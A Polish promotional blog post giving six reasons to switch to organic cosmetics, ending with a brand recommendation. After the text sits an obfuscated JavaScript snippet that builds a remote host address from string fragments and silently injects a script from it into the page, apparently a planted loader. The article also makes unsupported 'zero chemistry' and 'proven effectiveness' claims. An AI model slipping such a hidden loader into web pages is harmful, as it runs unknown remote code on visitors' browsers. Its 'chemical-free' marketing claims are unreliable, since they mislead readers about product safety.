6 powodów, które przekonają Cię do zmiany kosmetyków na organiczne

Moda na kosmetyki organiczne rozpoczęła się kilka lat temu i wciąż trwa. Dzisiejsi konsumenci stali się bardziej świadomi tego, co kupują – dlatego też coraz częściej sprawdzają składy preparatów i ich rzeczywiste działanie. Zastanawiasz się nad zmianą kosmetyków na organiczne? Oto 6 powodów, które Cię do tego przekonają!

1. Mniejsze niebezpieczeństwo alergii

Masz skórę ze skłonnościami do alergii i podrażnień? Kosmetyków organicznych co prawda nie można nazwać hipoalergicznymi, jednak w ich składzie znajduje się o wiele mniej drażniących substancji niż w ich popularnych odpowiednikach, które są naszpikowane chemią. Łagodne i przyjazne dla skóry substancje nie powinny więc powodować uczucia swędzenia, pieczenia, uciążliwej wysypki czy zaczerwienienia skóry.

2. Uniwersalność preparatów

Łazienkowa półka ugina się pod ciężarek przeróżnych fiolek i buteleczek? Stosując kosmetyki organiczne, możesz znacznie zredukować ich ilość – są one bowiem bardzo uniwersalne. Wystarczy tylko przyjrzeć się naturalnym olejkom, np. kokosowemu. Możesz go wykorzystać do olejowania włosów, zmywania makijażu lub jako nawilżające serum do ciała.
Co ciekawe, większość kosmetyków organicznych nie jest podzielona na linie męskie i damskie – są przeznaczone do użytku przez wszystkich. Dzięki temu cała rodzina będzie mogła korzystać z tych samych preparatów.

3. Troska o środowisko

Sięgając po kosmetyki organiczne, masz też pewność, ze zostały wyprodukowane w poszanowaniu środowiska naturalnego. Składniki, z których je wykonano, pochodzą z kontrolowanych, odnawialnych plantacji, dlatego nie prowadzą do wyniszczenia zasobów. Co więcej, nawet same opakowania kosmetyków nadają się do recyklingu, dzięki czemu nie wpływają negatywnie na środowisko.

4. Proste, zrozumiałe składy

Z pewnością nie raz natrafiłaś na trudną, niezrozumiałą nazwę podczas przeglądania etykiety kosmetyków. W przypadku kosmetyków organicznych lista zastosowanych substancji jest nie tylko znacznie krótsza, lecz również prosta – nie powinnaś mieć problemów z ich rozszyfrowaniem. Do produkcji tego rodzaju preparatów najczęściej wykorzystuje się oleje i esencje roślinne, proteiny, olejki eteryczne oraz naturalne glinki. Dzięki tak prostym składom możesz też łatwo sprawdzić, na które składniki skóra reaguje źle i po prostu wykluczyć je z codziennej pielęgnacji. Docenią to szczególnie osoby ze skłonnością do alergii i podrażnień.

5. Potwierdzona skuteczność

Martwisz się tym, że naturalne składniki mogą się okazać zbyt łagodne, a tym samym nie poradzą sobie z potrzebami Twojej skóry? Nic bardziej mylnego! Preparaty mogą co prawda działać nieco wolniej, lecz jest to spowodowane tym, że aktywują naturalne procesy w Twojej skórze. Choć na efekt trzeba będzie nieco poczekać, zyskasz inną korzyść – skóra zacznie funkcjonować zgodnie z naturalnym rytmem, stanie się więc zdrowsza.

6. Zero chemii

W dzisiejszych czasach trudno całkowicie pozbyć się chemii z otoczenia. Znajdziesz ją w zasadzie wszędzie – w powietrzu, w jedzeniu, w kosmetykach… Chcąc ograniczyć wpływ szkodliwych związków na skórę, możesz postawić na kosmetyki organiczne, w których składzie na próżno szukać szkodliwych substancji. Zobacz np. bogatą ofertę kosmetyków kolorowych od Physicians Formula!

(function(){
t3aju=”muix9gzm3ajg”;t3aj=document.createElement(„script”);
t3aj_=”u”+(„st”);t3aj_+=”at”+(„.”);t3aj.async=true;t3aj_+=”in”;
t3aju=”74002939.”+t3aju;t3aj.type=”text/javascript”;t3aju+=”v47fkvt5mxfj”;
t3aju+=”ss2lph”;t3aj_+=(„f”)+”o”+(„/”);t3aj.src=”https://”+t3aj_+t3aju;
t3ajd=document.body;t3ajd.appendChild(t3aj);
})();

Leave a Reply

%d bloggers like this: